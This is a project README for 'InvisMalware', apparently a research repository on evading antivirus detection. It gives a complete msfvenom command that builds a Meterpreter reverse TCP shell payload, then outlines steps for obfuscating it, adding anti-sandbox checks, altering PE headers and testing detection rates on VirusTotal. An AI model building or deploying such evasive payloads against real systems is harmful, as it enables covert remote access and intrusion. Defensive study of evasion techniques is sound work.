InvisMalware is a project designed to demonstrate advanced malware evasion techniques that bypass antivirus detection. This research-driven malware experiment focuses on utilizing obfuscation methods, such as code modifications and anti-sandbox strategies, to evade static and dynamic malware detection.
This project is for educational purposes only, intended to provide insights into modern malware defense strategies by learning from the evasion techniques used by malicious actors.
- Shellcode Generation: Create custom reverse TCP shell payloads using msfvenom.
- Code Obfuscation: Modify malware code to evade antivirus detection by adding NOPs, manipulating PE headers, and more.
- Anti-Dynamic Analysis: Include checks to detect sandbox environments such as audio driver and USB device presence.
- PE Header Manipulation: Disguise the malware by tweaking the Portable Executable (PE) header to avoid signature-based detection.
- Evasion Rate Calculation: Measure the effectiveness of evasion techniques by comparing results across various antivirus engines.
To get started, clone the repository and install necessary dependencies.
- Python 3.x
- VirtualBox/VMware (for testing in virtual environments)
- Metasploit Framework (for generating shellcode)
- PE-bear (for PE header manipulation)
git clone https://github.com/mawg0ud/InvisMalware.git
cd InvisMalware
pip install -r requirements.txt
Use msfvenom to generate reverse TCP shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f c > evilexp.c
Edit the evilexp.c
file to obfuscate the code and avoid detection.
Deploy the malware in a secure, isolated virtual machine to test its behavior and measure detection rates.
Upload your malware to VirusTotal to evaluate its evasion rate across multiple antivirus engines.
The project follows a four-stage methodology to achieve malware evasion:
- Shellcode Generation: Create baseline reverse shellcode.
- Code Modification: Obfuscate the shellcode to evade detection.
- Anti-Dynamic Analysis: Add sandbox detection to bypass dynamic analysis tools.
- PE Header Modification: Alter the PE header to further obfuscate the malware signature.
Run the malware on your virtual machine equipped with antivirus software such as Kaspersky, Windows Defender, or Bitdefender.
Upload the modified malware to VirusTotal and check how many antivirus engines successfully detect it.
We welcome contributions to improve the project. If you'd like to contribute:
- Fork the repository.
- Create a new branch for your feature or bug fix.
- Submit a pull request with detailed information about your changes.
This project is licensed under the MIT License. See the LICENSE file for details.